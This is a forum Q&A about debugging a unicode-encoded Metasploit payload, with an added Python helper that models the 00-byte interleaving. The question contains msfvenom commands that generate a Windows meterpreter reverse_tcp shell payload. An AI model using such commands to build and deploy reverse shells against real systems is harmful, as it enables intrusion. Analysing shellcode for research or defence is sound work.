shellcode metasploit

Debug unicode msfvenom payload


I'd like to debug an msfvenom-generated payload. I'm perfectly able to do it when I generate the payload with "standard" encoding in this way:

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/alpha_mixed BufferRegister=ECX

In this case, I can get the resulting payload, use something like Blobrunner and I'm ready to go.

If I generate a shellcode with unicode encoding

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/unicode_mixed BufferRegister=ECX

The same is not working: I get a lot of duplicated/invalid instructions when I process the shellcode. This makes sense because I guess I'm managing it as normal encoding. But how can I debug this shellcode? Any tool to convert it to a "valid" sequence removing the "unicode padding"?

Thanks a lot!


Solution

  • I think I got it: it's just a matter of adding an interleave with 00 between bytes...easy...don't know why I missed it before...
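
The interleaving described in the answer, as an added example that is not part of the original post: a Python analysis helper that builds the 00-interleaved (UTF-16LE) byte sequence a unicode_mixed payload is meant to be seen as in memory, and reverses it for a buffer taken from a dump. The function names and the sample bytes are assumptions made for this example.

```python
"""Analysis helper: model the ANSI -> UTF-16LE widening that a
unicode_mixed payload is designed to pass through before it runs."""


def widen(ascii_payload: bytes) -> bytes:
    """Return the in-memory form: every byte followed by 0x00.

    Only 7-bit bytes widen to `xx 00`. Bytes >= 0x80 depend on the
    target's code page, so they are rejected instead of guessed.
    """
    for offset, value in enumerate(ascii_payload):
        if value > 0x7F:
            raise ValueError(f"non-ASCII byte 0x{value:02x} at offset {offset}")
    out = bytearray(len(ascii_payload) * 2)   # all high bytes start as 0x00
    out[0::2] = ascii_payload                 # low bytes: original characters
    return bytes(out)


def looks_widened(buf: bytes) -> bool:
    """True if buf has the shape xx 00 xx 00 ... with 7-bit xx."""
    return (len(buf) >= 2 and len(buf) % 2 == 0
            and not any(buf[1::2])
            and all(b < 0x80 for b in buf[0::2]))


def narrow(buf: bytes) -> bytes:
    """Inverse of widen(): recover the generator's ASCII output from a
    dumped buffer so it can be compared with the original file."""
    if not looks_widened(buf):
        raise ValueError("buffer is not 00-interleaved ASCII")
    return buf[0::2]


if __name__ == "__main__":
    sample = b"ABCDabcd0123"      # constructed sample bytes, not a payload
    in_memory = widen(sample)
    print(in_memory.hex(" "))     # bytes to load into the debugger or disassembler
    print(narrow(in_memory) == sample)
```

Disassembling the output of `widen()` instead of the raw generator output gives the instruction stream the decoder was written for, which is why the un-widened bytes look like duplicated or invalid instructions.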